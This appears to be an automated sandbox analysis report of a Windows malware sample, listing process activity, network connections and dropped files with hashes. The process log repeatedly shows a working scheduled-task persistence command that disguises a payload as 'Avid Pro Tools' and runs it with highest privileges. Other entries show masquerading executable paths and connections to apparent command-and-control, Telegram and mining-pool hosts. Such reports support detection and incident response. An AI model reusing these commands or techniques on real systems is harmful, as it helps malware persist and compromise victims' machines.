"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\Vss\Writers\Application\WmiPrvSE.exe

C:\Windows\Vss\Writers\Application\WmiPrvSE.exe

C:\Recovery\WindowsRE\Refcrt.exe

C:\Recovery\WindowsRE\Refcrt.exe

C:\DriversavessessionDlldhcp\cmd.exe

C:\DriversavessessionDlldhcp\cmd.exe

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Recovery\WindowsRE\backgroundTaskHost.exe.exe

"C:\Recovery\WindowsRE\backgroundTaskHost.exe.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Recovery\WindowsRE\csrss.exe

C:\Recovery\WindowsRE\csrss.exe

C:\DriversavessessionDlldhcp\sysmon.exe

C:\DriversavessessionDlldhcp\sysmon.exe

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Program Files\Uninstall Information\SolaraBootstrapper.exe.exe

"C:\Program Files\Uninstall Information\SolaraBootstrapper.exe.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe.exe

"C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.22.46:443 www.nodejs.org tcp
US 8.8.8.8:53 nodejs.org udp
US 104.20.23.46:443 nodejs.org tcp
US 8.8.8.8:53 46.22.20.104.in-addr.arpa udp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 52.133.105.77.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 72.169.67.172.in-addr.arpa udp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 172.67.169.72:80 papka.top tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
FI 77.105.133.52:80 ozero.top tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
FI 77.105.133.52:80 ozero.top tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

MD5 d25ebdfc04bdadea74017fa72f90781f
SHA1 f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe

MD5 414b2c1de3b01b9f2cb8a3921f0cbd1f
SHA1 9eb52184bf86a64efb713d65927eb03052869abc
SHA256 185bcd14ce4b5531c75d57d2dc996cf6e69d46121a1cd83b6ffb746ccd36938f
SHA512 b47b105ece11cbc660c3a61ac1f7012fcbbaee77610ab4f4937111d224d8f6d8682bda720e0ee488c2deca5f0d8ed3a46c000eb9479c864f349758beaeeb7859

memory/2568-22-0x00007FFA562C3000-0x00007FFA562C5000-memory.dmp

memory/5044-20-0x0000000000400000-0x0000000000D8F000-memory.dmp

memory/2568-21-0x0000000000130000-0x00000000001B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Result.exe

MD5 170b43350048ed4b6fca0e50a0178621
SHA1 db863b7b04a7c58baa9120e2f184517ed27a7252
SHA256 248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
SHA512 e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

MD5 7d4b84a8c3d14cb3d1bb864719463404
SHA1 544cf51aec717c63552f0fdf97d364b1b62a7a0c
SHA256 3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663
SHA512 d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

MD5 11fdce42422f8ed518fedf290f5bfc3c
SHA1 f18a4ad694af5ba50a7697b4cb66308454c555d9
SHA256 b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3
SHA512 4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

memory/5072-56-0x0000000000400000-0x0000000000CC7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

MD5 7529e4004c0fe742df146464e6aeadb0
SHA1 ae7341ee066b31de5a1a1a25851b70ced41de13f
SHA256 a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81
SHA512 d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

C:\Users\Admin\AppData\Local\Temp\solara.exe

MD5 1797c0e37f4b9dd408cbf0d7bfcb7c95
SHA1 10df695351ac6074e23a3d3b4bd31a17c10fd614
SHA256 8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb
SHA512 52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

memory/5100-87-0x0000000000400000-0x000000000069B000-memory.dmp

memory/3012-92-0x0000000000200000-0x00000000002CE000-memory.dmp

C:\winNet\we9fgyC144zVOkGk.vbe

MD5 aa1a085aba94a5fc38c26b79a2217336
SHA1 f847af2aec7fd56fe8734ccb51d8027b9b4e817b
SHA256 f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545
SHA512 75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

memory/3012-93-0x0000000004FF0000-0x0000000005594000-memory.dmp

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

MD5 3492e48fb2e9fb2bfc18658e3d8f88bd
SHA1 34cec8222aedc8baf774aa863a041a23971c7631
SHA256 c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e
SHA512 a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

MD5 1a3448b944b91cebda73adc5064e6286
SHA1 4f8716c6e56a675944a5f0f250947c8d45a362e1
SHA256 5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5
SHA512 b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

MD5 83a7f739f51f1acd83f143afa6ec1533
SHA1 2f653f906842f8f507d02f81550eb26a35f38acc
SHA256 5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545
SHA512 c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

MD5 9cf4017a8383ae846a908c79a28354bf
SHA1 adbe6a02b90147431e80fc38100de42d88dd765a
SHA256 bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2
SHA512 490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

memory/4084-108-0x00000000004B0000-0x0000000000634000-memory.dmp

memory/4084-109-0x0000000000E90000-0x0000000000E9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

MD5 0e4e9aa41d24221b29b19ba96c1a64d0
SHA1 231ade3d5a586c0eb4441c8dbfe9007dc26b2872
SHA256 5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d
SHA512 e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

memory/4084-113-0x0000000000E50000-0x0000000000E6C000-memory.dmp

memory/4084-117-0x0000000000E80000-0x0000000000E90000-memory.dmp

memory/4084-116-0x0000000000EC0000-0x0000000000ED6000-memory.dmp

memory/4084-119-0x00000000028A0000-0x00000000028AE000-memory.dmp

memory/4084-118-0x0000000000EE0000-0x0000000000EEE000-memory.dmp

memory/4084-115-0x0000000000E70000-0x0000000000E78000-memory.dmp

memory/4084-114-0x0000000002A10000-0x0000000002A60000-memory.dmp

memory/4084-120-0x00000000028B0000-0x00000000028BA000-memory.dmp

memory/4084-121-0x00000000028C0000-0x00000000028CC000-memory.dmp

C:\Windows\Installer\MSID11B.tmp

MD5 9fe9b0ecaea0324ad99036a91db03ebb
SHA1 144068c64ec06fc08eadfcca0a014a44b95bb908
SHA256 e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9
SHA512 906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

C:\Windows\Installer\MSID1AA.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

memory/416-195-0x000002F4B9170000-0x000002F4B9192000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_judnfojy.lnq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\ZgZhaJuw4k.bat

MD5 844984ebf0448679b26b60f184d93a68
SHA1 00254004f97ae60f365074ee756aaf207575b372
SHA256 803a36c6f3a87f3d136f3958c64f1b258ed9ee4c9f31a23d19b6992ae815c78a
SHA512 c67b3bee66a08ff5de42b7ec415ce919231212c94a830c0e11924c32ef022aba8ea2a0daf730eb0c112f73d8611bd4424657b896df8d495c8b47d3acb9d8342d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e448fe0d240184c6597a31d3be2ced58
SHA1 372b8d8c19246d3e38cd3ba123cc0f56070f03cd
SHA256 c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391
SHA512 0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

memory/6600-409-0x00000184B4F70000-0x00000184B5191000-memory.dmp

memory/6600-410-0x00000184CFA60000-0x00000184CFC80000-memory.dmp

memory/6600-411-0x00000184B5520000-0x00000184B5532000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3f038ac2e2ceadad0f78317ea7de6881
SHA1 f2ee66d1ab22d5594426a26e9d2628ce29b037a7
SHA256 475591875182108710538a2ea21a89e0ffa1df43f776689288e0fa96da46efb7
SHA512 f751f1f06b79550af211a9bf39d59712bb60f4e2c79a24d850970b1d40e871c2e53ce84ed4f5d974dad53cdbfb95d38a8eff9f871f22ae2d3e772deb731715f4

C:\Windows\xdwd.dll

MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

memory/7124-485-0x000001D8CC700000-0x000001D8CC91C000-memory.dmp

C:\Windows\Installer\MSIF495.tmp

